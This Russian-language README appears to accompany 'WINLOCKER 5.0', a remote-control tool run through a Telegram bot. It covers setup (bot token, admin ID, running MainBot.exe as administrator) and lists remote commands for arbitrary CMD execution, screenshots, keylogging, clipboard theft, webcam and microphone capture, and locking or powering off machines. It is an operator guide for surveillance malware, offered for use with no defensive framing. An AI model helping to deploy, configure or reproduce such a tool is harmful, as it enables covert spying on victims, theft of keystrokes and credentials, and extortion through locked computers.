================================================================================
  WINLOCKER 5.0 - ИНСТРУКЦИЯ ПО ЗАПУСКУ
  Версия: v16.1 (Security Update)
================================================================================

 БЫСТРЫЙ СТАРТ:

1. Распакуй все файлы из архива в одну папку
2. Открой файл .env и вставь свои данные:
   - BOT_TOKEN=токен_твоего_бота
   - SUPER_ADMIN_ID=твой_ID_в_Telegram
3. Запусти MainBot.exe
4. Открой бота в Telegram и нажми /start

================================================================================
  ГДЕ ВЗЯТЬ ТОКЕН И ID:
================================================================================

BOT_TOKEN:
  1. Открой @BotFather в Telegram
  2. Отправь /newbot
  3. Придумай имя и username боту
  4. Скопируй токен который он даст

SUPER_ADMIN_ID:
  1. Открой @userinfobot в Telegram
  2. Отправь любое сообщение
  3. Скопируй свой Id (число)

================================================================================
  ФАЙЛЫ В АРХИВЕ:
================================================================================

✅ MainBot.exe - главный бот (запускать его!)
✅ config.py - конфигурация
✅ secure_config.py - безопасная загрузка настроек
✅ .env - файл с настройками (РЕДАКТИРОВАТЬ ЭТОТ ФАЙЛ!)
✅ database.py - база данных (создастся автоматически)
✅ bot_core.py - ядро системы
✅ bot_services.py - сервисные функции
✅ bot_commands.py - команды бота
✅ bot_callbacks.py - callback-кнопки
✅ hwid_generator.py - генерация HWID
✅ icon.ico - иконка

================================================================================
  ОСНОВНЫЕ КОМАНДЫ:
================================================================================

/start - Приветствие и регистрация
/panel - Панель управления
/info - Информация об устройстве
/screen - Скриншот экрана
/active - Активное окно
/procs - Список процессов
/cmd [команда] - Выполнить команду CMD
/lock - Блокировка компьютера
/poweroff - Выключение
/restart - Перезагрузка
/keylog_start - Запустить кейлоггер
/keylog - Просмотр лога клавиатуры
/keylog_stop - Остановить кейлоггер
/clipboard - Содержимое буфера обмена
/webcam - Фото с веб-камеры
/mic - Запись звука с микрофона
/admin_list - Список администраторов
/add_admin - Добавить админа
/del_admin - Удалить админа
/pc_list - Список устройств
/commands - Полный список команд

================================================================================
  ВАЖНО ДЛЯ КЕЙЛОГГЕРА:
================================================================================

⚠️ Кейлоггер (/keylog_start) требует прав администратора!
   - Запускай MainBot.exe от имени администратора
   - Или кейлоггер не будет записывать нажатия

================================================================================
  ВОЗМОЖНЫЕ ОШИБКИ:
================================================================================

❌ "ModuleNotFoundError" → Установи Python и зависимости:
   pip install pyTelegramBotAPI psutil pyautogui Pillow pygetwindow pyperclip requests keyboard pynput pywin32

❌ "BOT_TOKEN не настроен" → Проверь файл .env

❌ "Вы не являетесь администратором" → Твой ID не в базе, перезапусти бота

❌ Кейлоггер не работает → Запусти от имени администратора

================================================================================
  ТЕХНИЧЕСКАЯ ИНФОРМАЦИЯ:
================================================================================

Версия: v16.1
Python: 3.9-3.12
ОС: Windows 10/11
Требования: Python (для запуска из исходников), Telegram

================================================================================
  ПОДДЕРЖКА:
================================================================================

Логи ищи в файле: bot_runtime.log
База данных: bot_database.db (создаётся автоматически)

================================================================================

🎉 УДАЧИ! ВСЁ РАБОТАЕТ! 🚀
